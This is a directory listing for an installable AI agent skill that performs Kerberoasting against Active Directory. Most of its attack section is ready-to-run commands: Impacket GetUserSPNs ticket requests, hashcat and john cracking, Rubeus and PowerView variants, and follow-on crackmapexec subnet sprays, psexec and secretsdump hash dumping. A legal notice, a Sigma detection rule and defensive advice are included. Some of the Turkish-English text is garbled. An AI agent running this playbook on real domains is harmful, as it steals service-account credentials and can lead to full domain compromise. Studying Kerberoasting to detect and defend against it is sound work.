Perform Kerberoasting attacks using Impacket's GetUserSPNs to extract and crack Kerberos TGS tickets for Active Directory service accounts.
Scanned 9/8/2026
Install to Claude Code
npx -y skills add MustafaKemal0146/fetih --skill exploiting-kerberoasting-with-impacket --agent claude-codeInstalls into .claude/skills of the current project.
Are you the author of Exploiting Kerberoasting With Impacket?
Add the live security badge to your README — it updates automatically with every re-scan.
[](https://www.skillsdirectory.com/skills/mustafakemal0146-exploiting-kerberoasting-with-impacket)More formats (shields.io, HTML) on the badges page.
---
name: exploiting-kerberoasting-with-impacket
description: Perform Kerberoasting attacks using Impacket's GetUserSPNs to extract and crack Kerberos TGS tickets for Active Directory service accounts.
tags:
- kerberoasting
- t1558-003
- impacket
- kerberos
- service-accounts
- fetih
- cybersecurity
- credential-access
- red-teaming
- active-directory
- siber-güvenlik
triggers:
- adversary emulation
- email
- encryption
- exploit
- exploiting
- hash
- http
- impacket
- kerberoasting
- kırmızı takım
- log
- malware
category: red-team-operations
source_subdomain: red-teaming
nist_csf:
- ID.RA-01
- GV.OV-02
- DE.AE-07
adapted_for: fetih
---
# Exploiting Kerberoasting with Impacket
## Genel Bakış
Kerberoasting (MITRE ATT&CK T1558.003) is a credential access technique that targets Active Directory service accounts by requesting Kerberos TGS (Ticket Granting Service) tickets for accounts with Service Principal Names (SPNs). The TGS ticket is encrypted with the service account's NTLM hash (RC4 or AES), enabling offline brute-force cracking. Impacket's `GetUserSPNs.py` is the standard tool for Linux-based Kerberoasting attacks.
## Ne Zaman Kullanılır
- performing yaparken authorized security testing that involves exploiting kerberoasting with impacket
- analyzing yaparken malware samples or attack artifacts in a controlled environment
- conducting yaparken red team exercises or penetration testing engagements
- building yaparken Tespit capabilities based on offensive technique understanding
## Ön Gereksinimler
- Valid domain credentials (any domain user can request TGS tickets)
- Network Erişim: a Domain Controller (TCP/88 Kerberos, TCP/389 LDAP)
- Impacket kurulu (`pip install impacket`)
- Hashcat or John the Ripper for offline cracking
- Wordlist (e.g., rockyou.txt, SecLists)
> **Legal Notice:** bu skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
## MITRE ATT&CK Mapping
| Technique ID | Name | Tactic |
|---|---|---|
| T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting | Credential Access |
| T1087.002 | Account Discovery: Domain Account | Discovery |
| T1110.002 | Brute Force: Password Cracking | Credential Access |
## Adım 1: Enumerate Kerberoastable Accounts
```bash
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1
```
## Adım 2: Request TGS Tickets
```bash
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 -request
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
-request-user svc_sql
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
-request -outputfile kerberoast_hashes.txt
GetUserSPNs.py corp.local/jsmith -hashes :aad3b435b51404eeaad3b435b51404ee \
-dc-ip 10.10.10.1 -request -outputfile hashes.txt
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
-request -outputfile hashes.txt
```
## Adım 3: Crack TGS Tickets Offline
```bash
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt \
--rules-file /usr/share/hashcat/rules/best64.rule
hashcat -m 19700 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt
hashcat -m 13100 kerberoast_hashes.txt --show
```
## Adım 4: Validate and Use Cracked Credentials
```bash
crackmapexec smb 10.10.10.1 -u svc_sql -p 'Summer2024!' -d corp.local
crackmapexec smb 10.10.10.0/24 -u svc_sql -p 'Summer2024!' -d corp.local --local-auth
psexec.py corp.local/svc_sql:'Summer2024!'@SQL01.corp.local
secretsdump.py corp.local/svc_sql:'Summer2024!'@10.10.10.1 -just-dc-ntlm
```
## Alternative Tools
### Rubeus (Windows)
```powershell
.\Rubeus.exe kerberoast /outfile:hashes.txt
.\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql_hash.txt
.\Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt
.\Rubeus.exe kerberoast /aes /outfile:hashes.txt
```
### PowerView (PowerShell)
```powershell
Import-Module .\PowerView.ps1
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File hashes.txt
```
## Targeted Kerberoasting
High-value targets for Kerberoasting:
| Account Type | Why | Risk |
|---|---|---|
| Service accounts in Domain Admins | Direct path to domain compromise | Critical |
| SQL service accounts (MSSQLSvc) | Often have excessive privileges | High |
| Exchange service accounts | Erişim: all email | High |
| Accounts with AdminCount=1 | Previously/currently privileged | High |
| Accounts with old passwords | More likely to use weak passwords | Medium |
## Tespit
### Windows Event Logs
```
Event ID 4769 - Kerberos Service Ticket Request
- Monitor for: Encryption type 0x17 (RC4-HMAC) when AES is expected
- Monitor for: Single user requesting many TGS tickets in short period
- Monitor for: Service ticket requests from unusual source IPs
```
### Sigma Rule
```yaml
title: Potential Kerberoasting Activity
status: stable
logsource:
product: windows
service: security
Tespit:
selection:
EventID: 4769
TicketEncryptionType: '0x17' # RC4
ServiceName|endswith: '$'
filter:
ServiceName: 'krbtgt'
condition: selection and not filter
level: medium
tags:
- attack.credential_access
- attack.t1558.003
```
## Defensive Recommendations
1. **Use Group Managed Service Accounts (gMSA)** - 240-character random passwords, auto-rotated
2. **Set strong passwords (25+ chars)** on all service accounts
3. **Enable AES-only encryption** - Disable RC4 via GPO
4. **Monitor Event ID 4769** for RC4 TGS requests
5. **Implement Managed Service Accounts** where gMSA is not feasible
6. **Regular audits** - Run BloodHound to identify Kerberoastable accounts
7. **Protected Users group** - Add sensitive service accounts
8. **Honeypot SPNs** - Create decoy accounts with SPNs to tespit etmeattacks
## References
- MITRE ATT&CK T1558.003: https://attack.mitre.org/techniques/T1558/003/
- Impacket: https://github.com/fortra/impacket
- Harmj0y's Kerberoasting Revisited: https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1
- Tespit Strategy DET0157: https://attack.mitre.org/Tespitstrategies/DET0157/
<!--
⚔ Bu skill FETIH AI Agent icin gelistirilmistir — https://github.com/MustafaKemal0146/fetih
Yetkisiz kullanim/kopyalama tespit edilebilir.
hash: fa76d59f05288f79
-->
Is this your skill, or is something wrong with this listing? Request removal or report an issue. Author removals are honored within 72 hours.
No comments yet. Be the first to comment!